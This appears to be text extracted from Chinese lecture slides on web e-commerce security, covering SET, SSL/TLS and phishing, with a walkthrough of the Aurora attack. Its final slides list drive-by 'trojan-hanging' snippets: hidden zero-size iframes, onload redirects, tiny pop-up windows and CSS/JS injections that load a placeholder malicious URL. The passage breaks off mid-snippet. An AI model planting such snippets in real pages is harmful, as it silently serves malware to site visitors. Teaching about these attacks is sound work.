第12章Web電子商務(wù)安全

Web電子商務(wù)安全第十二章主講人：任凱聯(lián)系方式：renkai_jlxy@163.com百度云盤(pán)：/s/1qWykdjQ1第十二章WEB電子商務(wù)安全12.1電子商務(wù)概述12.2安全電子商務(wù)的體系結(jié)構(gòu)12.3安全電子交易SET12.4安全套接字層SSL12.5數(shù)字現(xiàn)金協(xié)議12.6網(wǎng)上銀行2B2C是從企業(yè)到終端客戶（包括個(gè)人消費(fèi)者和組織消費(fèi)者）的業(yè)務(wù)模式。

B2B是企業(yè)與企業(yè)之間的業(yè)務(wù)模式。電子商務(wù)模式3（1）冒名偷窺。（2）篡改數(shù)據(jù)。（3）信息丟失。（4）信息傳遞過(guò)程中的破壞。

12.1.2電子商務(wù)的安全4Internet12.2安全電子商務(wù)的體系結(jié)構(gòu)

網(wǎng)絡(luò)平臺(tái)電子商務(wù)基礎(chǔ)平臺(tái)電子商務(wù)應(yīng)用系統(tǒng)CA認(rèn)證中心、支付網(wǎng)關(guān)、客戶服務(wù)中心

網(wǎng)上投標(biāo)

網(wǎng)上訂票

網(wǎng)上交費(fèi)

網(wǎng)上銀行

網(wǎng)上超市

遠(yuǎn)程醫(yī)療5背景：VISA與MASTERCARD兩大信用卡國(guó)際組織共同發(fā)起制定保障在因特網(wǎng)上進(jìn)行安全電子交易的SET(SecureElectronicTransaction)協(xié)議由眾多信息產(chǎn)業(yè)公司，如Microsoft、Netscape、RSA等共同協(xié)作發(fā)展而成用途：圍繞客戶、商家等交易各方相互之間身份的確認(rèn)，采用了電子證書(shū)等技術(shù)，以保障交易安全12.3安全電子交易SET

612.3.1SET協(xié)議概述SET協(xié)議主要內(nèi)容加密算法（RSA和DES）的應(yīng)用證書(shū)消息和對(duì)象格式購(gòu)買(mǎi)消息和對(duì)象格式付款消息和對(duì)象格式參與者之間的消息協(xié)議712.3.1SET協(xié)議概述SET支付系統(tǒng)中的相關(guān)成員：

81.SET協(xié)議消息傳輸過(guò)程SET協(xié)議消息發(fā)送過(guò)程:

數(shù)字信封：將對(duì)稱(chēng)密鑰通過(guò)非對(duì)稱(chēng)公鑰加密的結(jié)果分發(fā)對(duì)稱(chēng)密鑰的方法12.3.2SET協(xié)議工作原理91.SET協(xié)議消息傳輸過(guò)程

SET協(xié)議消息接收過(guò)程：12.3.2SET協(xié)議工作原理10(1)消費(fèi)者互聯(lián)網(wǎng)購(gòu)買(mǎi)的物品并形成訂貨單。訂貨單上需包括在線商店、購(gòu)買(mǎi)物品名稱(chēng)及數(shù)量、交貨時(shí)間及地點(diǎn)等相關(guān)信息(2)消費(fèi)者選擇付款方式、確認(rèn)訂單、簽發(fā)付款指令。SET開(kāi)始介入(3)在SET中，消費(fèi)者必須對(duì)訂單和付款指令進(jìn)行數(shù)字簽名，同時(shí)利用雙重簽名技術(shù)保證商家看不到消費(fèi)者的賬號(hào)信息(4)在線商店接受訂單后，向消費(fèi)者所在銀行請(qǐng)求支付認(rèn)可。信息通過(guò)支付網(wǎng)關(guān)到持卡人的發(fā)卡銀行請(qǐng)求支付認(rèn)可。批準(zhǔn)交易后，返回確認(rèn)信息給電商(5)電商發(fā)送訂單確認(rèn)信息給消費(fèi)者(6)電商發(fā)送貨物或提供服務(wù)，支付網(wǎng)關(guān)通知發(fā)卡銀行請(qǐng)求支付(7)消費(fèi)者確認(rèn)收貨后，支付網(wǎng)關(guān)支付給收款銀行2.SET協(xié)議流程

12.3.2SET協(xié)議工作原理113.雙重簽名產(chǎn)生背景：消費(fèi)者不想讓銀行看到訂單細(xì)節(jié)，同時(shí)也不想讓商家看到銀行支付信息

例如消息A是訂單信息，消息B是支付信息，或者互換一下12.3.2SET協(xié)議工作原理123.雙重簽名消息的驗(yàn)證例如消息A是訂單信息，消息B是支付信息12.3.1SET協(xié)議工作原理13Netscape公司開(kāi)發(fā)的一個(gè)網(wǎng)絡(luò)安全協(xié)議已成為事實(shí)上的安全網(wǎng)上交易標(biāo)準(zhǔn)協(xié)議三個(gè)版本：SSL1.0SSL2.0SSL3.0IETF發(fā)布了TLS(TransportLayerSecurity),TLS1.0

通常被稱(chēng)作SSL3.1TLS1.1TLS1.2SSL與SET最大不同在于SSL是一個(gè)雙方協(xié)議，僅提供通信雙方的安全保證，而SET協(xié)議則提供通信多方的安全保證SSL比SET簡(jiǎn)單得多，目前在Web服務(wù)中已廣泛使用

12.4安全套接字層SSL(SecureSocketsLayer，SSL）1412.4.1SSL概述SSL功能：客戶認(rèn)證服務(wù)器身份服務(wù)器認(rèn)證客戶身份客戶與服務(wù)器自動(dòng)協(xié)商生成密鑰加密客戶與服務(wù)器間的數(shù)據(jù)，并可抵御重放攻擊檢測(cè)客戶與服務(wù)器間數(shù)據(jù)的完整性151.SSL協(xié)議體系結(jié)構(gòu)SSL僅被廣泛用于HTTP連接SSL位于TCP和應(yīng)用層協(xié)議(如HTTP)之間理論上，SSL可以運(yùn)行于任何TCP/IP應(yīng)用程序之上，而不用對(duì)其做任何修改12.4.2SSL工作原理16SSL記錄協(xié)議在客戶機(jī)和服務(wù)器之間傳輸應(yīng)用數(shù)據(jù)和SSL控制數(shù)據(jù)2.SSL記錄協(xié)議12.4.2SSL工作原理172.SSL記錄協(xié)議SSL記錄協(xié)議報(bào)文格式：

12.4.2SSL工作原理18NetworkandInformationSecurity12.4.2SSL工作原理3.SSL改變密碼規(guī)范協(xié)議和告警協(xié)議195.SSL握手協(xié)議：該協(xié)議允許客戶和服務(wù)器相互驗(yàn)證、協(xié)商加密和MAC算法以及密鑰，用來(lái)保護(hù)SSL記錄發(fā)送的數(shù)據(jù)。12.4.2SSL工作原理20網(wǎng)絡(luò)釣魚(yú)流程圖2112.6網(wǎng)上銀行網(wǎng)絡(luò)釣魚(yú)(SpearPhishing)極光行動(dòng)（Aurora）2009年12月中旬可能源自中國(guó)“精心策劃且目標(biāo)明確”的一場(chǎng)網(wǎng)絡(luò)攻擊，其名稱(chēng)“Aurora”（意為極光、歐若拉）來(lái)自攻擊者電腦上惡意文件所在路徑的一部分。遭受攻擊的除了Google外，還有20多家公司：其中包括AdobeSystems、JuniperNetworks、Rackspace、雅虎、賽門(mén)鐵克、諾斯洛普·格魯門(mén)和陶氏化工Google表示有部分知識(shí)產(chǎn)權(quán)遭到盜竊。它認(rèn)為，黑客的主要興趣在于訪問(wèn)中國(guó)持不同政見(jiàn)者的Gmail帳戶美國(guó)國(guó)務(wù)卿希拉里·克林頓發(fā)表了一則簡(jiǎn)短聲明譴責(zé)此次攻擊事件，并要求中國(guó)作出回應(yīng)[12]。中國(guó)政府當(dāng)時(shí)并未做出正式回應(yīng)美國(guó)國(guó)會(huì)計(jì)劃對(duì)Google的指控進(jìn)行調(diào)查，后者指控中國(guó)政府利用計(jì)算機(jī)服務(wù)監(jiān)視人權(quán)活動(dòng)人士2212.6網(wǎng)上銀行網(wǎng)絡(luò)釣魚(yú)(SpearPhishing)極光行動(dòng)（Aurora）攻擊過(guò)程回放：搜集Google員工在Facebook、Twitter等社交網(wǎng)站上發(fā)布的信息；利用動(dòng)態(tài)DNS供應(yīng)商建立托管偽造照片網(wǎng)站的Web服務(wù)器，Google員工收到來(lái)自信任的人發(fā)來(lái)的網(wǎng)絡(luò)鏈接并且點(diǎn)擊，含有shellcode的JavaScript造成IE瀏覽器溢出，遠(yuǎn)程下載并運(yùn)行程序；通過(guò)SSL安全隧道與受害人機(jī)器建立連接，持續(xù)監(jiān)聽(tīng)并最終獲得該雇員訪問(wèn)Google服務(wù)器的帳號(hào)密碼等信息；使用該雇員的憑證成功滲透進(jìn)入Google郵件服務(wù)器，進(jìn)而不斷獲取特定Gmail賬戶的郵件內(nèi)容信息2312.6網(wǎng)上銀行網(wǎng)絡(luò)釣魚(yú)(SpearPhishing)極光行動(dòng)（Aurora）從用戶單擊釣魚(yú)郵件那一刻開(kāi)始講起1.三次握手建立連接2.攻擊者的機(jī)器收到一個(gè)GET請(qǐng)求3.數(shù)據(jù)包6返回了一個(gè)302碼（重定向頁(yè)面）4.從Details面板中可以看到一個(gè)Location域，它指明重定向位置是/info?rFfWELUjLJHpP在第9包上右擊“FollowTCPStream”2412.6網(wǎng)上銀行病毒2512.6網(wǎng)上銀行2612.6網(wǎng)上銀行根據(jù)顯示的內(nèi)容找到25包2712.6網(wǎng)上銀行已經(jīng)獲得了無(wú)限制的管理權(quán)限2812.6網(wǎng)上銀行一些常用的掛馬方式框架掛馬<iframesrc="網(wǎng)馬地址"width=0height=0></iframe>body掛馬<bodyonload="window.location='網(wǎng)馬地址';"></body>java掛馬<scriptlanguage=javascript>window.open("網(wǎng)馬地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>js文件掛馬將代碼“document.write("<iframewidth=0height=0src='網(wǎng)馬地址'></iframe>");”保存為muma.js文件，則js文件掛馬代碼為“<scriptlanguage=javascriptsrc=muma.js></script>”2912.6網(wǎng)上銀行一些常用的掛馬方式：css中掛馬body{background-image:url('javascript:document.write("<scriptsrc=/muma.js></script>")')}高級(jí)欺騙<ahref=(迷惑連接地址)onMouseOver="muma();r